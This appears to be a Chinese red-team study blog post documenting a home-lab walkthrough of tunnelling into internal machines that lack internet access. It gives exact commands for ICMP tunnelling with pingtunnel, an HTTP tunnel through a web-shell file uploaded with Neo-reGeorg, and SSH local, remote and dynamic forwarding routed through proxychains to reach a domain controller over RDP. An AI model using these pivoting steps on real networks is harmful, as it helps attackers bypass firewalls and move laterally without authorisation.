红队笔记Day3-->隧道上线不出网机器

昨天讲了通过代理的形式(端口转发)实现了上线不出网的机器,那么今天就来讲一下如何通过隧道上线不出网机器

红队笔记Day3-->隧道上线不出网机器_第1张图片    红队笔记Day3-->隧道上线不出网机器_第2张图片

目录

1.网络拓扑

2.开始做隧道?No!!!

3.icmp隧道

4.HTTP隧道

5.SSH隧道

1.什么是ssh隧道

2.ssh隧道:端口转发

3.SSH远程端口转发

4.ssh动态端口转发


1.网络拓扑

今天我youyouyouyouyoyoyo又配环境配到崩溃了,是的,配环境已经给我整麻了(kali的网卡那里感觉有点问题,怎么配都配不好)所以我知难而退,改换桥接!!

红队笔记Day3-->隧道上线不出网机器_第3张图片

红队笔记Day3-->隧道上线不出网机器_第4张图片 大概是这样的一个网络拓扑

2.开始做隧道?No!!!

第一部肯定不是做隧道啊!,你连防火墙给你通过什么流量都不知道,做啥隧道,做了流量也过不去,所以!!正确的第一步,是通过对应的流量探测去制定隧道的种类!!!

3.icmp隧道

所谓的icmp隧道就是:将数据包夹带在icmp的数据包中,其中,ICMP 隧道几乎在所有的网络环境中都是被允许的,因此攻击者可以通过 ICMP 隧道绕过一些网络安全设备。

但是!!!这个程序似乎在一些低版本的Windows上运行不了(缺少一些系统动态链接库文件)

虽然win11可以(但是很多内网的环境都是用的win7 winserver这种的)所以适用范围较窄感觉

红队笔记Day3-->隧道上线不出网机器_第5张图片

即便是这样,那也还是要将草走复现一下的!

先是kali上的命令

sysctl -w net.ipv4.icmp_echo_ignore_all=1  //用于禁用本机对icmp流量的应答

然后再win7靶机上运行

pingtunnel.exe -type server -noprint 1 -nolog 1

然后kali上运行以下命令,意思就是将本机的8888作为scok5的连接端接口

bash pingtunnel -type client -l:8888 192.168.3.58 -sock5 1

最后就在kali上修改一个配置文件

vim /etc/proxychain4.conf //并且在底部添加一行socks5 127.0.0.1 8888 即可

 就可以远程连接了

proxychains rdesktop 192.168.52.138

4.HTTP隧道

这个比较常见,我们经常都是通过一个web漏洞去getshell的,所以防火墙一般不会限制http流量

HTTP隧道有特别特别多,今天来分享一个加密隧道穿透 Neoreg-reGeorg

下载连接 :项目概览 - Neo-reGeorg - GitCode

开整,先再摆一下网络拓扑,以免忘记

红队笔记Day3-->隧道上线不出网机器_第6张图片

先在kali上运行,k后面可以跟上你自己的密码

python neoreg.py -k "你的密码"

然后判断网站的语言,我这个win7上搭建的是php的网站

红队笔记Day3-->隧道上线不出网机器_第7张图片

我们在执行完kali的命令之后会生成一个文件夹

 红队笔记Day3-->隧道上线不出网机器_第8张图片      --->       红队笔记Day3-->隧道上线不出网机器_第9张图片

选择对应的网站语言扔上去 (我这里扔的是tunnel.php)可以看见能成功访问

红队笔记Day3-->隧道上线不出网机器_第10张图片

于是就在kali上执行这个命令,意思就是开本地的8888端口来连接远程的php文件

python neoreg.py -k "你的密码" -u http://192.168.3.58/tunnel.php  -p 8888

这就可以了???,肯定不是啊,你还没开socks5的本地代理端口,咳咳咳,差点忘记说了

这个工具建立的是socks5代理,所以你就开启对应的代理端口

vim /ect/proxychains4.conf

红队笔记Day3-->隧道上线不出网机器_第11张图片 在这个文件的最底端加上这个指令 socks5 127.0.0.1 8888

然后就可以连接啦!!!!     红队笔记Day3-->隧道上线不出网机器_第12张图片

proxychains rdesktop 192.168.52.138 //这个可以直接写内网的地址!!!

 这样就能成功连接上去了!!!!嘿嘿嘿

红队笔记Day3-->隧道上线不出网机器_第13张图片

 当然了,http隧道可不止这一种,tunna abptts pivotnaacci 这些都是http的隧道,就不多枚举了

5.SSH隧道

众所周知,在实战中一般服务器都是的Linux_like的,于是小编就去下载了一个Ubuntu来玩一下

红队笔记Day3-->隧道上线不出网机器_第14张图片

是时候该更新网络拓扑啦

   红队笔记Day3-->隧道上线不出网机器_第15张图片  于是这样我们就有了一台新的Linux服务器,可以搞事情了

直接访问它的网站根目录下的文件hhhh~~~

 红队笔记Day3-->隧道上线不出网机器_第16张图片 

1.什么是ssh隧道

在实际中,大部分的Linux服务器都支持ssh协议,内网中的主机和设备以及边界的防火墙都允许ssh流量通过,但是!!!ssh除了可以远程连接,还可以转发流量,并且是加密转发,进而突破防火墙限制

2.ssh隧道:端口转发

首先确定Ubuntu的22端口开放,以及知道它的账号密码 ,就可以在kali进行以下操作

ssh -L 8887 192.168.52.138:3389 [email protected] -p 22

这个的意思就是

  • kali先通过连接Ubuntu服务器
  • 又因为Ubuntu可以和内网通信, -L 意思为将靶机的3389端口的流量准发到攻击机的8887端口
  • 当kali访问本地的8887就等于在访问内网DC的3389端口

这样就可以同时连接上两台服务器!!!

红队笔记Day3-->隧道上线不出网机器_第17张图片

红队笔记Day3-->隧道上线不出网机器_第18张图片

3.SSH远程端口转发

这个和本地端口转发有点类似不过要先获取它的root权限,这个Linux不用于Linux

蚁剑是无法执行ssh的,而且上线cs有点困难我不会,于是就要在ubuntu上面敲这个代码

ssh -R 8887:192.168.52.138:3389 [email protected] -p 22

前提是你的攻击机器kali开启22端口!!可以这样查看

sudo systemctl status ssh 

红队笔记Day3-->隧道上线不出网机器_第19张图片没开启的话开启就好

sudo systemctl start ssh

红队笔记Day3-->隧道上线不出网机器_第20张图片

然后在你的Ubuntu上面输入kali的密码就能成功连接了

红队笔记Day3-->隧道上线不出网机器_第21张图片

但是,在你连接上了内网DC的时候,Ubuntu也是连接上了你的kali

红队笔记Day3-->隧道上线不出网机器_第22张图片

如果你的虚拟机配置不当,或者说别的大佬有0day,是可以造成虚拟机越狱的,那到时候你就惨了

4.ssh动态端口转发

所谓的动态端口转发就是建立起一个ssh加密的socks4/5的代理隧道,我们需要在kali运行以下命令

ssh -D 8888 [email protected] 

然后就能连接上Ubuntu了,其中的 -D意为建立socks5隧道流量走8888端口,去连接ubutu的22端口

红队笔记Day3-->隧道上线不出网机器_第23张图片

当然了,以上能成功,是在socks5代理成功配置的情况下噢红队笔记Day3-->隧道上线不出网机器_第24张图片

满足上述条件,就能实现内网穿透了,远程上线成功!!!!

红队笔记Day3-->隧道上线不出网机器_第25张图片

以上,就是多种的协议对应的一些隧道!!当然还有很多,像DNS ,RDP ,IPV6都是有对应隧道的,这里我就不枚举了!!

 明天讲什么呢?? 讲隧道穿透利用方法, 多层代理,反正向代理,多级代理,节点加密,节点穿透,对应工具部署!!!! Byd我都期待起来了!! 

  红队笔记Day3-->隧道上线不出网机器_第26张图片  

你可能感兴趣的:(隧道,内网,红队)